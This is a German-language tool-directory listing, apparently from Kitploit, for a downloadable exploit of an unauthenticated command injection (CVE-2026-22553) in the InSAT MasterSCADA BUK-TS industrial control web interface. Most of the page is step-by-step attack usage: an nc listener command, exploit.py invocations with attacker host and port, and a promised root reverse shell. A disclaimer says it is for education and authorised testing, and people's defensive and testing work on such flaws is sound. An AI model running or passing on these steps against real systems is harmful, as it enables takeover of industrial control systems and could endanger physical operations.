Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Tools/GitHubGitHub/mbanyamer/cve-2026-22553-insat-masterscada-buk-ts-mmadmserv
Payload-GenerierungExploitationSCADA/ICS-SicherheitWebanwendungs-ExploitationPenetrationstestsCommand and Control
GitHubmbanyamer/cve-2026-22553-insat-masterscada-buk-ts-mmadmserv

CVE-2026-22553-InSAT-MasterSCADA-BUK-TS-MMadmServ

Nicht authentifizierter OS-Befehlseinschleusungs-Exploit für die InSAT MasterSCADA BUK-TS MMadmServ Web-Oberfläche. Liefert eine Reverse-Shell mit Root-Berechtigungen über eine HTTP-POST-Anfrage. CVSS 9.8 kritisch.

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Repository anzeigen
vor 3 MonatenNoch nicht geprüft

CVE-2026-22553 Python License Author

InSAT MasterSCADA BUK-TS - Nicht authentifizierte RCE

CVE-2026-22553 | CVSS 9.8 Kritisch | Exploit-Autor Mohammed Idrees Banyamer


📝 Beschreibung

InSAT MasterSCADA BUK-TS weist eine Nicht authentifizierte OS-Befehlseinschleusung im MMadmServ-Webinterface auf. Diese Sicherheitslücke ermöglicht es entfernten Angreifern, ohne Authentifizierung eine vollständige Remote-Codeausführung (RCE) zu erreichen.

  • Betroffenes Produkt: InSAT MasterSCADA BUK-TS (Alle Versionen)
  • Verwundbarkeitstyp: OS Command Injection (CWE-78)
  • Schweregrad: Kritisch (CVSS v3.1 Score: 9.8)
  • Exploit-Autor: Mohammed Idrees Banyamer
  • Land: Jordanien 🇯🇴

🛠️ Angriffsmethoden-Diagramm

root@kitploit:~
flowchart TD
    A[Attacker] -->|HTTP POST Request| B[MMadmServ Web Interface]
    B -->|Unauthenticated| C[Vulnerable Parameter]
    C -->|OS Command Injection| D[Command Execution on Target Server]
    D -->|Reverse Shell| E[Attacker's Listener\nnc -lvnp <port>]
    
    style A fill:#ff4d4d,stroke:#fff
    style E fill:#4dff88,stroke:#fff

🚀 Verwendung

root@kitploit:~
python3 exploit.py <target_url> --lhost <your_ip> --lport <your_port>

Beispiel

root@kitploit:~
python3 exploit.py http://192.168.1.50:8080 --lhost 192.168.1.100 --lport 4444

Optionen

OptionBeschreibung
targetZiel-URL (z.B. http://ip:port)
--lhostIhre IP-Adresse (Reverse Shell)
--lportIhr Listening-Port

📌 Anleitung

  1. Starten Sie einen Listener auf Ihrem Rechner:

    root@kitploit:~
    nc -lvnp 4444
    
  2. Führen Sie den Exploit aus:

    root@kitploit:~
    python3 exploit.py http://target-ip:port --lhost your-ip --lport 4444
    
  3. Erhalten Sie eine Reverse-Shell mit root/system-Rechten.


⚠️ Haftungsausschluss

Dieser Exploit wird ausschließlich zu Bildungs- und autorisierten Penetrationstest-Zwecken bereitgestellt.
Die unbefugte Nutzung gegen Systeme, die Ihnen nicht gehören, ist illegal und kann gegen internationale Gesetze verstoßen.
Der Autor übernimmt keine Verantwortung für Missbrauch.


📬 Autor

Mohammed Idrees Banyamer

  • Instagram: @banyamer_security
  • GitHub: mbanyamer
  • Land: Jordanien 🇯🇴

Star ⭐ dieses Repository, wenn Sie es nützlich fanden!

Tool herunterladen